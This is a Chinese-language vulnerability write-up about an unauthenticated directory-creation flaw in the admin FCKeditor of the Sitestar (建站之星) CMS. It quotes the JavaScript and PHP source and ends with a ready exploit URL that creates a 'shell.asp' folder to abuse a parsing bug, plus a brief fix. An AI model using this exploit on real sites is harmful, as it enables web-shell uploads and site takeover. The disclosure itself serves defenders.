建站之星全版本后台通杀getshell的解析与解决方法
找到一个fck改的编辑器,准备用解析洞日之。<br /><img src="https://img.jbzj.com/do/uploads/allimg/120629/1624190.jpg" alt="" /><br />然后发现无法这玩意直接过滤了“.”创建不了解析文件夹,<br />反复试了几次之后发现这个过滤是有延迟的。大概在0.1秒后 才会去掉。于是果断查看源码看函数:<br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode26"><br />function addSort(obj) {<br /> $(obj).parent().find(‘span’).css(‘display’,'inline-block’);<br /> $(obj).css(‘display’,'none’);<br /> $(obj).parent().find(‘span > input:first’).focus();<br /> }<br /> function newDir(obj) {<br /> var pth = $(obj).prev().attr(‘value’);<br /> var basepth = $(‘#gtcurdir option:selected’).text();<br /> if (pth.replace(/^\s+|\s+$/g,”).length == 0) { //这里对定义的PTH变量进行了判断,(“/^\s+|\s+$/g,”),思路是 判断如果文本框内不算以上字符 长度等于0则继续执行.<br /> alert(“请输入字符”);<br /> $(obj).prev().focus();<br /> return false;<br /> } else {<br /> $.ajax({<br /> type : “GET”,<br /> dataType : “text”,<br /> url : “../mkdir.ajax.php?basedir=”+basepth+”&newdir=”+pth,//这里直接发送url 基本类型+新文件夹名+文件夹名。<br /> success : function(response) {<br /> switch (response) {<br /> case ’0′:<br /> $(obj).prev().val(”);<br /> $(obj).parent().css(‘display’,'none’);<br /> $(obj).parent().parent().find(‘a’).css(‘display’,'inline-block’);<br /> $(‘<option value=”‘+basepth+pth+’/” selected=”true”>’+basepth+pth+’/</option>’).appendTo(‘#gtcurdir’);<br /> break;<br /> case ‘-1′:<br /> alert(“文件夹已存在!”);<br /> $(obj).prev().focus();<br /> break;<br /> case ‘-2′:<br /> alert(“新建文件夹失败!”);<br /> break;<br /> }<br /> },<br /> error : function(response) {<br /> alert(“请求失败!”);<br /> return false;<br /> }<br /> });<br /> }<br /></div><br />看完函数 发现有一个很有意思的地方:<br /><font color="#ff0000">url : “../mkdir.ajax.php?basedir=”+basepth+”&newdir=”+pth,<br /></font>这里直接post出去命令。那么我们可否构造呢<br />于是查看了这个脚本的源码:<br /><font color="#800000"><?php//</font>!!!竟然没有验证<br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode27"><br />header(‘Conten-type:text/html; charset=UTF-8′);<br />define(‘SSFCK’, str_replace(“\\”, “/”, dirname(__FILE__)));<br />$adminRoot = str_replace(“\\”, “/”, substr(SSFCK, 0, -10));<br />define(‘SSROOT’, str_replace(“\\”, “/”, realpath($adminRoot.”/..”)));<br />$err = ’0′;<br />$basedir = trim($_GET['basedir']);//这里直接GET来自前面那个urlpost来的变量<br />$newdir = trim($_GET['newdir']);<br />// is or not exist dir<br />$hd = dir(“../../”.$basedir);<br />while(($path = $hd->read()) !== false) {<br />if ($path == $newdir) {<br />$err = ‘-1′;<br />break;<br />} else continue;<br />}<br />if ($err != ‘-1′) {<br />if (!mkdir(“../../{$basedir}{$newdir}”, 0755)) $err = ‘-2′;<br />}<br />echo $err;<br />?><br /></div><br />程序员果然天然呆,不验证登陆,这里不验证文件名,任凭urlpost任意信息。<br />到这里知道了程序漏洞所在。附上exp:<br />http:// /admin/fckeditor/mkdir.ajax.php?basedir=upload/image/&newdir=shell.asp<br />返回0则表示成功。<br /> <strong>修复方案:</strong><br />对mkdir.ajax.php加验证<br />
頁:
[1]